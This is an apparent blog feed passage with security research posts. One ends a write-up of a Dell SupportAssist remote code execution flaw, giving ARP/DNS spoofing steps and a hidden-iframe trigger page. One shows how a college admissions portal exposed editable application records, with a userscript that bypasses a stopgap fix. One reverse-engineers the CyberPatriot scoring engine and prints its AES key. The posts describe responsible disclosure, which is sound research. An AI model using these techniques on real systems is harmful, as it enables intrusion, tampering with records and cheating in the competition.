</code></pre><p>Next up was the attack from the local network. Here are the steps I take in the external portion of my proof of concept (attacker&apos;s machine):</p><ol><li>Grab the interface IP address for the specified interface.</li><li>Start the mock web server and provide it with the filename of the payload we want to send. The web server checks if the Host header is <code>downloads.dell.com</code> and if so sends the binary payload. If the request Host has dell.com in it and is not the downloads domain, it sends the JavaScript payload which we mentioned earlier.</li><li>To ARP spoof the victim, we first enable IP forwarding, then send an ARP packet to the victim telling it that we&apos;re the router and an ARP packet to the router telling it that we&apos;re the victim machine. We repeat these packets every few seconds for the duration of our exploit. On exit, we send the original MAC addresses to the victim and router.</li><li>Finally, we DNS spoof by using iptables to redirect DNS packets to a netfilter queue. We listen to this netfilter queue and check if the requested DNS name is our target URL. If so, we send a fake DNS packet back indicating that our machine is the true IP address behind that URL.</li><li>When the victim visits our subdomain (either directly via URL or indirectly by an iframe), we send it the malicious JavaScript payload, which finds the service port for the agent, grabs the signature from the PHP file we created earlier, then sends the RCE payload. When the RCE payload is processed by the agent, it will make a request to <code>downloads.dell.com</code>, which is when we return the binary payload.</li></ol><p>You can read Dell&apos;s advisory <a href="https://www.dell.com/support/article/us/en/19/sln316857/dsa-2019-051-dell-supportassist-client-multiple-vulnerabilities">here</a>.</p><h1 id="demo">Demo</h1><p>Here&apos;s a small demo video showcasing the vulnerability.
You can download the source code of the proof of concept <a href="https://github.com/D4stiny/Dell-Support-Assist-RCE-PoC">here</a>.</p><p>The source code of the dellrce.html file featured in the video is:</p><pre><code class="language-html">&lt;h1&gt;CVE-2019-3719&lt;/h1&gt;
&lt;h1&gt;Nothing suspicious here... move along...&lt;/h1&gt;
&lt;!-- Hidden iframe pointing at our spoofed subdomain; the page it loads runs the exploit JavaScript --&gt;
&lt;iframe src=&quot;http://www.dellrce.dell.com&quot; style=&quot;width: 0; height: 0; border: 0; border: none; position: absolute;&quot;&gt;&lt;/iframe&gt;
</code></pre><h1 id="timeline">Timeline</h1><p>10/26/2018 - Initial write-up sent to Dell.</p><p>10/29/2018 - Initial response from Dell.</p><p>11/22/2018 - Dell has confirmed the vulnerability.</p><p>11/29/2018 - Dell scheduled a &quot;tentative&quot; fix to be released in Q1 2019.</p><p>01/28/2019 - Disclosure date extended to March.</p><p>03/13/2019 - Dell is still fixing the vulnerability and has scheduled disclosure for the end of April.</p><p>04/18/2019 - Vulnerability disclosed as an <a href="https://www.dell.com/support/article/us/en/19/sln316857/dsa-2019-051-dell-supportassist-client-multiple-vulnerabilities">advisory</a>.</p>]]></content:encoded></item><item><title><![CDATA[Hacking College Admissions]]></title><description><![CDATA[<p>Getting into college is one of the more stressful times of a high school student&apos;s life. Since the admissions process can be quite subjective, students have to consider a variety of factors to convince the admissions officers that &quot;they&apos;re the one&quot;. Some families do</p>]]></description><link>https://billdemirkapi.me/hacking-college-admissions/</link><guid isPermaLink="false">60276f0cd8acfdb32a877064</guid><category><![CDATA[Security Research]]></category><dc:creator><![CDATA[Bill Demirkapi]]></dc:creator><pubDate>Sat, 13 Apr 2019 14:13:00 GMT</pubDate><media:content url="https://billdemirkapi.me/content/images/2021/02/targetx.png" medium="image"/><content:encoded><![CDATA[<img src="https://billdemirkapi.me/content/images/2021/02/targetx.png" alt="Hacking College Admissions"><p>Getting into college is one of the more stressful times of a high school student&apos;s life. Since the admissions process can be quite subjective, students have to consider a variety of factors to convince the admissions officers that &quot;they&apos;re the one&quot;. Some families do as much as they can to improve their chances - even going as far as trying to cheat the system.
For wealthier families, this might be donating a very large amount to the school or, as we&apos;ve heard in the news recently, bribing school officials.</p><p>If you don&apos;t know about me already, I&apos;m a 17-year-old high school senior who has an extreme interest in the information security field and was part of the college admissions process this year. Being part of the college admissions process made me interested in investigating: &quot;Can you hack yourself into a school?&quot;. In this article, I&apos;ll be looking into <a href="https://www.targetx.com/">TargetX</a>, a &quot;Student Lifecycle Solution for Higher Education&quot; that serves <strong>several schools</strong>. All of this research was because of my genuine interest in security, not because I wanted to get into a school through malicious means.</p><h1 id="investigation">Investigation</h1><p>The school I applied to that was using TargetX was the <a href="https://www.wpi.edu">Worcester Polytechnic Institute</a> in Worcester, Massachusetts. After submitting my application on the Common App, an online portal used to apply to hundreds of schools, I received an email to register on their admissions portal. The URL was the first thing that jumped out at me, <a href="https://wpicommunity.force.com/apply">https://wpicommunity.<strong>force.com</strong>/apply</a>. Force.com reminded me of Salesforce, and at first I didn&apos;t think Salesforce did college admissions portals. Visiting force.com brought me to their product page for their &quot;Lightning Platform&quot; software. It looked like a website-building system for businesses. I thought the college might have made their own system, but when I looked at the source of the registration page, it referred to something else called TargetX. This is how I found out that TargetX was simply using Salesforce&apos;s &quot;Lightning Platform&quot; to create a college admissions portal.</p><p>After registering, I started to analyze what was being accessed.
At the same time, I kept in mind that this was a Salesforce Lightning Platform site. First, I found that their REST API hinged on a route called &quot;apexremote&quot;; this turned out to be Salesforce&apos;s way of exposing classes to clients through REST. <a href="https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/apex_rest_intro.htm">Here</a> is the documentation for that. Fortunately, WPI had configured it correctly so that you could only access the APIs you were supposed to access, so it was pretty locked down. I thought about other APIs Salesforce might expose and found out they had a <a href="https://developer.salesforce.com/docs/atlas.en-us.api_rest.meta/api_rest/intro_what_is_rest_api.htm">separate REST/SOAP API</a> too. In WPI&apos;s case, they did a good job restricting this API from student users, but in general this is a great attack vector (I found this API exposed on a different Salesforce site).</p><p>After digging through several JavaScript files and learning more about the platform, I found out that Salesforce had a user interface backend system. I decided to try to access it, so I tried a random URL: <code>/apply/_ui/search/ui/aaaaa</code>. This resulted in a page that looked like this:</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2023/12/image.png" class="kg-image" alt="Hacking College Admissions" loading="lazy" width="1097" height="175" srcset="https://billdemirkapi.me/content/images/size/w600/2023/12/image.png 600w, https://billdemirkapi.me/content/images/size/w1000/2023/12/image.png 1000w, https://billdemirkapi.me/content/images/2023/12/image.png 1097w" sizes="(min-width: 720px) 720px"></figure><p>It looked like a standard 404 page. What caught my eye was the search bar on the top right. I started playing around with the values and found out it supported basic wildcards.
I typed my name and used an asterisk to see if I could find anything.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2023/12/image-1.png" class="kg-image" alt="Hacking College Admissions" loading="lazy" width="926" height="609" srcset="https://billdemirkapi.me/content/images/size/w600/2023/12/image-1.png 600w, https://billdemirkapi.me/content/images/2023/12/image-1.png 926w" sizes="(min-width: 720px) 720px"></figure><p>Sorry for the censoring, but the results included some sensitive details. It seemed as though I could access my own &quot;Application Form&quot; and contact. I was not able to access the application of any other students, which came as a relief, but it soon turned out that just being able to access my own application was severe enough.</p><p>After clicking on my name in the People section, I saw that there was an application record assigned to me. I clicked on it, and it redirected me to a page with a significant amount of information.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2023/12/image-2.png" class="kg-image" alt="Hacking College Admissions" loading="lazy" width="1187" height="742" srcset="https://billdemirkapi.me/content/images/size/w600/2023/12/image-2.png 600w, https://billdemirkapi.me/content/images/size/w1000/2023/12/image-2.png 1000w, https://billdemirkapi.me/content/images/2023/12/image-2.png 1187w" sizes="(min-width: 720px) 720px"></figure><p>Here&apos;s a generalized list of everything I was able to access:</p><pre><code>General application information
Decision information (detailed list of different considered factors)
Decision dates
Financial Aid information
GPA
Enrollment information
Decision information (misc. options i.e to show decision or not)
Recommendations (able to view them)
SAT / ACT Scores
High school transcript
Personal statement
Application fee</code></pre><p>Here&apos;s where it gets even worse: I can <strong>edit everything</strong> I just listed above. For example:</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2023/12/image-3.png" class="kg-image" alt="Hacking College Admissions" loading="lazy" width="544" height="240"></figure><p>Don&apos;t worry, I didn&apos;t accept myself into any schools or make my SAT score a 1600.</p><h1 id="initial-contact">Initial contact</h1><p>After finding this vulnerability, I <strong>immediately</strong> reached out to WPI&apos;s security team the same day to let them know about the vulnerabilities I found. They were very receptive, and within a day they applied their first &quot;patch&quot;. Whenever I tried accessing the backend panel, I would see my screen flash for a quick second and then a 404 message popped up.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2023/12/image-4.png" class="kg-image" alt="Hacking College Admissions" loading="lazy" width="643" height="333" srcset="https://billdemirkapi.me/content/images/size/w600/2023/12/image-4.png 600w, https://billdemirkapi.me/content/images/2023/12/image-4.png 643w"></figure><p>The flash had me interested; upon reading the source code of the page, I found all the data still there! I was very confused and diff&apos;d the source code with an older copy I had saved. This is the JavaScript block that got added:</p><pre><code class="language-javascript">if (typeof sfdcPage != &apos;undefined&apos;) {
    if (window.stop) {
        window.stop();
    } else {
        document.execCommand(&quot;Stop&quot;);
    }
    /*lil too much*/
    if (typeof SimpleDialog != &apos;undefined&apos;) {
        var sd = new SimpleDialog(&quot;Error&quot; + Dialogs.getNextId(), false);
        sd.setTitle(&quot;Error&quot;);
        sd.createDialog();
        window.parent.sd = sd;
        sd.setContentInnerHTML(&quot;&lt;p align=&apos;center&apos;&gt;&lt;img src=&apos;/img/msg_icons/error32.png&apos; style=&apos;margin:0 5px;&apos;/&gt;&lt;/p&gt;&lt;p align=&apos;center&apos;&gt;404 Page not found.&lt;/p&gt;&lt;p align=&apos;center&apos;&gt;&lt;br /&gt;&lt;/p&gt;&quot;);
        sd.show();
    }
    document.title = &quot;Error 404&quot;;
}</code></pre><p>This gave me a good chuckle. What they were doing was stopping the page from loading and then replacing the HTML with a 404 error. I could just use NoScript, but I decided to create a simple userscript to disable their tiny &quot;fix&quot;.</p><pre><code class="language-javascript">(function() {
    &apos;use strict&apos;;

    if(document.body.innerHTML.includes(&quot;404 Page not found.&quot;)) {
        window.stop();
        const xhr = new XMLHttpRequest();
        xhr.open(&apos;GET&apos;, window.location.href);
        xhr.onload = () =&gt; {
            var modified_html = xhr.responseText
            .replace(/&lt;script\b[\s\S]*?&lt;\/script&gt;/g, s =&gt; {
                if (s.includes(&quot;lil too much&quot;))
                    return &quot;&quot;; // Return nothing for the script content
                return s;
            });
            document.open();
            document.write(modified_html);
            document.close();
        };
        xhr.send();
    }
})();</code></pre><p>Basically, this userscript re-requests the page, removes any &quot;404&quot; script blocks, and then sets the current page to the updated HTML. It worked great and bypassed their fix. As suspected, WPI had only put a &quot;band aid over the issue&quot; to stop any immediate attacks. What I later learned when looking at some other schools was that TargetX themselves added the script under the name &quot;TXPageStopper&quot; - this wasn&apos;t just WPI&apos;s fix.</p><p>It&apos;s important to note that if you tried this today, the 404 page would still be removed, but nothing behind it is accessible anymore. They&apos;ve had this page stopper since January, and after shipping a real patch for the actual issue, they just never removed it.</p><h1 id="remediation">Remediation?</h1><p>This is going to be a small section about my interactions with WPI after sending them the vulnerability details. I first found and reported this vulnerability back in January, specifically the third. WPI was very responsive (often replying within hours). I contacted them again on February 14th, asking how the vulnerability patch was going and whether this was a vulnerability in <em>only</em> WPI or in TargetX too. Again within an hour, WPI responded saying that they had fixed the issues and that they had a &quot;final meeting set up for the incident review&quot;. They said, &quot;It was a combination of a TargetX vulnerability as well as tightening up some of our security settings&quot;.</p><p>I immediately (within 8 minutes) replied to their email asking for the TargetX side of the vulnerability to apply for a CVE. This is when things turned sour. Five days passed with no reply. I sent a follow-up email to check in. I sent another follow-up the next week, and the week after that. Complete radio silence.
By March 16th, I decided to send a final email letting them know that I intended to publish about the vulnerability that week, but this time I CC&apos;d the boss of the person I was in contact with.</p><p>Within a day, on a Sunday, the boss replied saying that they had not been aware that I was waiting on information. This is specifically what that email said:</p><blockquote>We will reach out to TargetX tomorrow and determine and confirm the exact details of what we are able to release to you. I will be in touch in a day or two with additional information once we have talked with TargetX. We would prefer that you not release any blog posts until we can follow-up with TargetX. Thank you.</blockquote><p>Of course, if the vulnerability had not been completely patched yet, I did not want to bring any attention to it. I sent back an email thanking them for the reply and saying that I looked forward to hearing more.</p><p>A week passed. I sent a follow-up email asking about the status of things. No response. I sent another follow-up the next week, and this time I mentioned that I was again planning to publish. <strong>Radio silence.</strong></p><p>It has been about a week since I sent that email, and because I have had no response from them, I decided to publish, given that they had said they had patched the vulnerability and because I could not extract any more data.</p><h1 id="other-schools-impacted">Other schools impacted</h1><p>I named this post &quot;Hacking College Admissions&quot; because this vulnerability was not just in WPI. Besides WPI confirming this to me themselves, I found similar vulnerabilities in other schools that were using the TargetX platform.</p><p>To find other schools impacted, I enumerated the subdomains of <strong>force.com</strong> and looked for universities. I am sure I missed some schools, but this is a small list of the other schools affected.</p><pre><code>Antioch University
Arcadia University
Averett University
Bellevue University
Berklee College of Music
Boston Architectural College
Boston University
Brandman University
Cabrini University
California Baptist University
California School Of The Arts, San Gabriel Valley
Cardinal University
City Year
Clarion University of Pennsylvania
Columbia College
Concordia University, Irvine
Concordia University, Montreal
Concordia University, Oregon
Concordia University, Texas
Delaware County Community College
Dominican University
ESADE Barcelona
Eastern Oregon University
Eastern University
Embry-Riddle Aeronautical University
Fashion Institute of Design &amp; Merchandising
George Mason University
George Washington University
Grove City College
Harvard Kennedy School
Hood College
Hope College
Illinois Institute of Technology
International Technological University
Johnson &amp; Wales University
Keene State College
Laguna College
Lebanon Valley College
Lehigh Carbon Community College
London School of Economics and Political Science
Mary Baldwin University
Master&apos;s University
Moravian College
Nazareth College
New York Institute of Technology
Oregon State University
Pepperdine University
Piedmont College
Plymouth State University
Regis College
Saint Mary&apos;s University of Minnesota
Simpson University
Skagit Valley College
Summer Discovery
Texas State Technical College
Towson University
USC Palmetto College
University of Akron
University of Arizona, Eller MBA
University of California, Davis
University of California, San Diego
University of California, Santa Barbara
University of Dayton
University of Houston
University of Maine
University of Michigan-Dearborn
University of Nevada, Reno
University of New Hampshire
University of New Haven
University of Texas, Dallas
University of Virginia
University of Washington
University of Alabama, Birmingham
West Virginia University
Western Connecticut State University
Western Kentucky University
Western Michigan University
Wisconsin Indianhead Technical College
Worcester Polytechnic Institute
Wright State University</code></pre><p>There are some schools that appeared to be running on the same Salesforce platform but on a custom domain, which is probably why I missed some schools.</p><h1 id="conclusion">Conclusion</h1><p>It turns out, having lots of money isn&apos;t the only way to get into your dream college, and yes, you can &quot;Hack yourself into a school&quot;. The scary part about my findings was that WPI had been vulnerable since it implemented the Salesforce system in 2012. Maybe students should be taking a better look at the systems around them, because I can only imagine what would have happened if someone had found something like this and used it to cheat the system.</p><p>I hope you enjoyed the article and feel free to message me if you have any questions.</p>]]></content:encoded></item><item><title><![CDATA[Reversing the CyberPatriot National Competition Scoring Engine]]></title><description><![CDATA[<h3 id="edit-4-12-2019">Edit 4/12/2019</h3><p>Originally, I published this post a month ago. After my post, I received a kind email from one of the primary developers for CyberPatriot asking that I take my post down until they can change their encryption algorithm. Given that the national competition for CyberPatriot XI</p>]]></description><link>https://billdemirkapi.me/reversing-the-cyberpatriot-national-competition/</link><guid isPermaLink="false">60276d2c81d551a2be3a2200</guid><category><![CDATA[Security Research]]></category><dc:creator><![CDATA[Bill Demirkapi]]></dc:creator><pubDate>Fri, 12 Apr 2019 22:10:00 GMT</pubDate><media:content url="https://billdemirkapi.me/content/images/2021/02/cyberpatriot-1518277061-1236.jpg" medium="image"/><content:encoded><![CDATA[<h3 id="edit-4-12-2019">Edit 4/12/2019</h3><img src="https://billdemirkapi.me/content/images/2021/02/cyberpatriot-1518277061-1236.jpg" alt="Reversing the CyberPatriot National Competition Scoring Engine"><p>Originally, I published this post a month ago.
After my post, I received a kind email from one of the primary developers for CyberPatriot asking that I take my post down until they could change their encryption algorithm. Given that the national competition for CyberPatriot XI was in a month, I decided to take the post down until after national competitions completed. National competitions ended yesterday, which is why I am re-publishing this write-up now.</p><h3 id="disclaimer">Disclaimer</h3><p>This article pertains to the competitions prior to 2018, as I have stopped participating in newer competitions and am therefore no longer subject to the competition&#x2019;s rule book. This information is meant for educational use only and as fair use commentary for the competition in past years.</p><h2 id="preface">Preface</h2><p>CyberPatriot is the Air Force Association&apos;s &quot;national youth cyber education program&quot;. The gist of the competition is that competitors (teams around the nation) are given virtual machines that are vulnerable, usually due to configuration issues or malicious files. Competitors must find and patch these holes to gain points.</p><p>The points are calculated by the CyberPatriot Scoring Engine, a program which runs on the vulnerable virtual machine and does routine checks on the vulnerable aspects of the system to see if they were patched.</p><p>I am a high school senior who participated in the competition in 2015-2016, 2016-2017, and 2017-2018, for a total of 3 years. The furthest my team got was regionals, though we once spent a good hour under the 12th-place cut-off for nationals. I did not participate this year because, unfortunately, the organization that was hosting CyberPatriot teams, ours included, stopped doing so due to the learning curve.</p><p>This all started when I was cleaning up my hard drive to clear up some space.
I found an old folder called &quot;CyberPatriot Competition Images&quot; and decided to take a look. In the years I was competing in CyberPatriot, I had some reversing knowledge, but it was nothing compared to what I can do today. I thought it would be a fun experiment to take a look at the most critical piece of the CyberPatriot infrastructure - the scoring engine. In this article, I&apos;m going to be taking an in-depth look into the CyberPatriot scoring engine, specifically for the 2017-2018 (CyberPatriot X) year.</p><h3 id="general-techniques">General Techniques</h3><p>If all you wanted to do was see what the engine accesses, the easiest way would be to hook different Windows API functions such as CreateFileW or RegOpenKeyExA. The reason I wanted to go deeper is that hooking alone doesn&apos;t show you what they&apos;re actually checking, which is the juicy data we want.</p><h3 id="reversing">Reversing</h3><p>When the Scoring Engine first starts, it initially registers service control handlers and does generic service status updates. The part we are interested in is when it first initializes.</p><p>Before the engine can start scanning for vulnerabilities, it needs to know what to check and where to send the results of the checks. The interesting part of the Scoring Engine is that this information <strong>is stored offline</strong>. This means everything the virtual machine will check is stored on disk and does not require an internet connection. This somewhat surprised me, because storing the upload URL and other general information on disk makes sense, but storing what&apos;s going to be scored?</p><p>After initializing service-related classes, the engine instantiates a class that will contain the parsed information from the local scoring data. Local scoring data is stored (encrypted) in a file called &quot;ScoringResource.dat&quot;.
This file is typically stored in the &quot;<code>C:\CyberPatriot</code>&quot; folder in the virtual machine.</p><p>The Scoring Data needs to be decrypted and parsed into the information class. This happens in a function I call &quot;<code>InitializeScoringData</code>&quot;. At first, the function can be quite overwhelming due to its size. It turns out, only the first part does the decryption of the Scoring Data; the rest is just parsing through the XML (the Scoring Data is stored in XML format). The beginning of the &quot;<code>InitializeScoringData</code>&quot; function finds the path to the &quot;<code>ScoringResource.dat</code>&quot; file by referencing the path of the current module (&quot;<code>CCSClient.exe</code>&quot;, the scoring engine, is in the same folder as the Scoring Data). For encryption and decryption, the Scoring Engine uses the Crypto++ library (version 5.6.2) with AES-GCM. After finding the name of the &quot;<code>ScoringResource.dat</code>&quot; file, the engine initializes the CryptContext for decryption.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2023/12/image-5.png" class="kg-image" alt="Reversing the CyberPatriot National Competition Scoring Engine" loading="lazy" width="1024" height="694" srcset="https://billdemirkapi.me/content/images/size/w600/2023/12/image-5.png 600w, https://billdemirkapi.me/content/images/size/w1000/2023/12/image-5.png 1000w, https://billdemirkapi.me/content/images/2023/12/image-5.png 1024w" sizes="(min-width: 720px) 720px"></figure><p>The function above initializes the cryptographic context that the engine will later use for decryption. I opted to go with a screenshot to show how the AES Key is displayed in IDA Pro. The AES Key Block starts at <code>Context + 0x4</code> and is 16 bytes.
Following endianness, the key ends up being <code>0xB, 0x50, 0x96, 0x92, 0xCA, 0xC8, 0xCA, 0xDE, 0xC8, 0xCE, 0xF6, 0x76, 0x95, 0xF5, 0x1E, 0x99</code>, spanning <code>*(_DWORD*)(Context + 4)</code> through <code>*(_DWORD*)(Context + 0x10)</code>.</p><p>After initializing the cryptographic context, the Decrypt function will check that the encrypted data file exists and enter a function I call &quot;<code>DecryptData</code>&quot;. This function is not only used for decrypting the Scoring Data, but also Scoring Reports.</p><p>The &quot;<code>DecryptData</code>&quot; function starts off by reading in the Scoring Data from the &quot;<code>ScoringResource.dat</code>&quot; file using the boost library. It then instantiates a new &quot;<code>CryptoPP::StringSink</code>&quot; and sets the third argument to be the output string. StringSinks are a type of object CryptoPP uses to output to a string. For example, there is also a FileSink if you want to output to a file. The &quot;<code>DecryptData</code>&quot; function then passes on the CryptContext, FileBuffer, FileSize, and the StringSink to a function I call &quot;<code>DecryptBuffer</code>&quot;.</p><p>The &quot;<code>DecryptBuffer</code>&quot; function first checks that the file is greater than 28 bytes; if it is not, it does not bother decrypting. The function then instantiates a &quot;<code>CryptoPP::BlockCipherFinal</code>&quot; for the AES Class and sets the key and IV. The interesting part is that the IV used for AES Decryption is the <strong>first 12 bytes</strong> of the file we are trying to decrypt. These bytes are not part of the encrypted content and should be disregarded when decrypting the buffer. If you remember, the key for the AES decryption was specified in the initialize CryptoPP function.</p><p>After setting the key and IV used for the AES decryption, the function instantiates a &quot;<code>CryptoPP::ZlibDecompressor</code>&quot;.
It turns out that the Scoring Data is deflated with Zlib before being encrypted; thus, to recover the Scoring Data, it must be inflated again. This Decompressor is attached to the &quot;<code>StreamTransformationFilter</code>&quot; so that after decryption and before the data is put into the OutputString, the data is inflated.</p><p>The function starts decrypting by pumping the correct data into different CryptoPP filters. AES-GCM verifies the hash of the file as you decrypt, which is why you&apos;ll hear me referring to the &quot;<code>HashVerificationFilter</code>&quot;. The &quot;<code>AuthenticatedDecryptionFilter</code>&quot; decrypts, and the &quot;<code>StreamTransformationFilter</code>&quot; allows the data to be used in a pipeline.</p><p>First, the function inputs the last 16 bytes of the file into the &quot;<code>HashVerificationFilter</code>&quot;, along with the IV. Then, it inputs the file contents after the 12th byte into the &quot;<code>AuthenticatedDecryptionFilter</code>&quot;, which subsequently pipes it into the &quot;<code>StreamTransformationFilter</code>&quot;, which inflates the data on the go. If the &quot;<code>HashVerificationFilter</code>&quot; does not throw an error, it returns that the decryption succeeded.</p><p>The output buffer now contains the XML Scoring Data. Here is the format it takes:</p><pre><code class="language-xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;CyberPatriotResource&gt;
  &lt;ResourceID&gt;&lt;/ResourceID&gt;
  &lt;Tier/&gt;
  &lt;Branding&gt;CyberPatriot&lt;/Branding&gt;
  &lt;Title&gt;&lt;/Title&gt;
  &lt;TeamKey&gt;&lt;/TeamKey&gt;
  &lt;ScoringUrl&gt;&lt;/ScoringUrl&gt;
  &lt;ScoreboardUrl&gt;&lt;/ScoreboardUrl&gt;
  &lt;HideScoreboard&gt;true&lt;/HideScoreboard&gt;
  &lt;ReadmeUrl/&gt;
  &lt;SupportUrl/&gt;
  &lt;TimeServers&gt;
    &lt;Primary&gt;&lt;/Primary&gt;
    &lt;Secondary&gt;http://time.is/UTC&lt;/Secondary&gt;
    &lt;Secondary&gt;http://nist.time.gov/&lt;/Secondary&gt;
    &lt;Secondary&gt;http://www.zulutime.net/&lt;/Secondary&gt;
    &lt;Secondary&gt;http://time1.ucla.edu/home.php&lt;/Secondary&gt;
    &lt;Secondary&gt;http://viv.ebay.com/ws/eBayISAPI.dll?EbayTime&lt;/Secondary&gt;
    &lt;Secondary&gt;http://worldtime.io/current/utc_netherlands/8554&lt;/Secondary&gt;
    &lt;Secondary&gt;http://www.timeanddate.com/worldclock/timezone/utc&lt;/Secondary&gt;
    &lt;Secondary&gt;http://www.thetimenow.com/utc/coordinated_universal_time&lt;/Secondary&gt;
    &lt;Secondary&gt;http://www.worldtimeserver.com/current_time_in_UTC.aspx&lt;/Secondary&gt;
  &lt;/TimeServers&gt;
  &lt;DestructImage&gt;
    &lt;Before&gt;&lt;/Before&gt;
    &lt;After&gt;&lt;/After&gt;
    &lt;Uptime/&gt;
    &lt;Playtime/&gt;
    &lt;InvalidClient&gt;&lt;/InvalidClient&gt;
    &lt;InvalidTeam/&gt;
  &lt;/DestructImage&gt;
  &lt;DisableFeedback&gt;
    &lt;Before&gt;&lt;/Before&gt;
    &lt;After&gt;&lt;/After&gt;
    &lt;Uptime/&gt;
    &lt;Playtime/&gt;
    &lt;NoConnection&gt;&lt;/NoConnection&gt;
    &lt;InvalidClient&gt;&lt;/InvalidClient&gt;
    &lt;InvalidTeam&gt;&lt;/InvalidTeam&gt;
  &lt;/DisableFeedback&gt;
  &lt;WarnAfter/&gt;
  &lt;StopImageAfter/&gt;
  &lt;StopTeamAfter/&gt;
  &lt;StartupTime&gt;60&lt;/StartupTime&gt;
  &lt;IntervalTime&gt;60&lt;/IntervalTime&gt;
  &lt;UploadTimeout&gt;24&lt;/UploadTimeout&gt;
  &lt;OnPointsGained&gt;
    &lt;Execute&gt;C:\CyberPatriot\sox.exe C:\CyberPatriot\gain.wav -d -q&lt;/Execute&gt;
    &lt;Execute&gt;C:\CyberPatriot\CyberPatriotNotify.exe You Gained Points!&lt;/Execute&gt;
  &lt;/OnPointsGained&gt;
  &lt;OnPointsLost&gt;
    &lt;Execute&gt;C:\CyberPatriot\sox.exe C:\CyberPatriot\alarm.wav -d -q&lt;/Execute&gt;
    &lt;Execute&gt;C:\CyberPatriot\CyberPatriotNotify.exe You Lost Points.&lt;/Execute&gt;
  &lt;/OnPointsLost&gt;
  &lt;AutoDisplayPoints&gt;true&lt;/AutoDisplayPoints&gt;
  &lt;InstallPath&gt;C:\CyberPatriot&lt;/InstallPath&gt;
  &lt;TeamConfig&gt;ScoringConfig&lt;/TeamConfig&gt;
  &lt;HtmlReport&gt;ScoringReport&lt;/HtmlReport&gt;
  &lt;HtmlReportTemplate&gt;ScoringReportTemplate&lt;/HtmlReportTemplate&gt;
  &lt;XmlReport&gt;ScoringData/ScoringReport&lt;/XmlReport&gt;
  &lt;RedShirt&gt;tempfile&lt;/RedShirt&gt;
  &lt;OnInstall&gt;
    &lt;Execute&gt;cmd.exe /c echo Running installation commands&lt;/Execute&gt;
  &lt;/OnInstall&gt;
  &lt;ValidClient&gt; &lt;!-- Requirements for VM --&gt;
    &lt;ResourcePath&gt;C:\CyberPatriot\ScoringResource.dat&lt;/ResourcePath&gt;
    &lt;ClientPath&gt;C:\CyberPatriot\CCSClient.exe&lt;/ClientPath&gt;
    &lt;ClientHash&gt;&lt;/ClientHash&gt;
    &lt;ProductID&gt;&lt;/ProductID&gt;
    &lt;DiskID&gt;&lt;/DiskID&gt;
    &lt;InstallDate&gt;&lt;/InstallDate&gt;
  &lt;/ValidClient&gt;
  &lt;Check&gt;
    &lt;CheckID&gt;&lt;/CheckID&gt;
    &lt;Description&gt;&lt;/Description&gt;
    &lt;Points&gt;&lt;/Points&gt;
    &lt;Test&gt;
      &lt;Name&gt;&lt;/Name&gt;
      &lt;Type&gt;&lt;/Type&gt;
      &lt;&lt;!--TYPE DATA--&gt;&gt;&lt;/&lt;!--TYPE DATA--&gt;&gt; &lt;!-- Data that is the specified type --&gt;
    &lt;/Test&gt;
    &lt;PassIf&gt;
      &lt;&lt;!--TEST NAME--&gt;&gt;
        &lt;Condition&gt;&lt;/Condition&gt;
        &lt;Equals&gt;&lt;/Equals&gt;
      &lt;/&lt;!--TEST NAME--&gt;&gt;
    &lt;/PassIf&gt;
  &lt;/Check&gt;
  &lt;Penalty&gt;
    &lt;CheckID&gt;&lt;/CheckID&gt;
    &lt;Description&gt;&lt;/Description&gt;
    &lt;Points&gt;&lt;/Points&gt;
    &lt;Test&gt;
      &lt;Name&gt;&lt;/Name&gt;
      &lt;Type&gt;&lt;/Type&gt;
      &lt;&lt;!--TYPE DATA--&gt;&gt;&lt;/&lt;!--TYPE DATA--&gt;&gt; &lt;!-- Data that is the specified type --&gt;
    &lt;/Test&gt;
    &lt;PassIf&gt;
      &lt;&lt;!--TEST NAME--&gt;&gt;
        &lt;Condition&gt;&lt;/Condition&gt;
        &lt;Equals&gt;&lt;/Equals&gt;
      &lt;/&lt;!--TEST NAME--&gt;&gt;
    &lt;/PassIf&gt;
  &lt;/Penalty&gt;
  &lt;AllFiles&gt;
    &lt;FilePath&gt;&lt;/FilePath&gt;
    ...
  &lt;/AllFiles&gt;
  &lt;AllQueries&gt;
    &lt;Key&gt;&lt;/Key&gt;
    ...
  &lt;/AllQueries&gt;
&lt;/CyberPatriotResource&gt;
</code></pre><p>The check XML elements tell you exactly what they check for. I don&apos;t have the Scoring Data for this year because I did not participate, but here are some XML Scoring Data files for past years:</p><p><strong>2016-2017 CP-IX High School Round 2 Windows 8:</strong> <a href="https://gist.github.com/D4stiny/2367313096c5a09cae2b1269fda02052">Here</a></p><p><strong>2016-2017 CP-IX High School Round 2 Windows 2008:</strong> <a href="https://gist.github.com/D4stiny/03a5e27fe5bee7990e91cb0251e009d7">Here</a></p><p><strong>2016-2017 CP-IX HS State Platinum Ubuntu 14:</strong> <a href="https://gist.github.com/D4stiny/4ef8fe2ea744b9f149ac34c144bd6a3d">Here</a></p><p><strong>2017-2018 CP-X Windows 7 Training Image:</strong> <a href="https://gist.github.com/D4stiny/2b0ef7ddb8375205de120c9146290265">Here</a></p><h2 id="tool-to-decrypt">Tool to decrypt</h2><p>This is probably what a lot of you are looking for, just drag and drop an encrypted &quot;<code>ScoringResource.dat</code>&quot; onto the program, and the decrypted version will be printed. If you don&apos;t want to compile your own version, there is a compiled binary in the Releases section.</p><p><strong>Github Repo</strong>: <a href="https://github.com/D4stiny/CyberPatriot-Decrypt">Here</a></p><h2 id="continuing-reversing">Continuing reversing</h2><p>After the function decrypts the buffer of Scoring Data, the &quot;<code>InitializeScoringData</code>&quot; parses through it and fills the information class with the data from the XML. The &quot;<code>InitializeScoringData</code>&quot; is only called once at the beginning of the engine and is not called again.</p><p>From then on, until the service receives the STOP message, it constantly checks to see if a team patched a vulnerability. In the routine function, the engine checks if the scoring data was initialized/decrypted, and if it wasn&apos;t, decrypts again. This is when the second check is done to see whether or not the image should be destructed. 
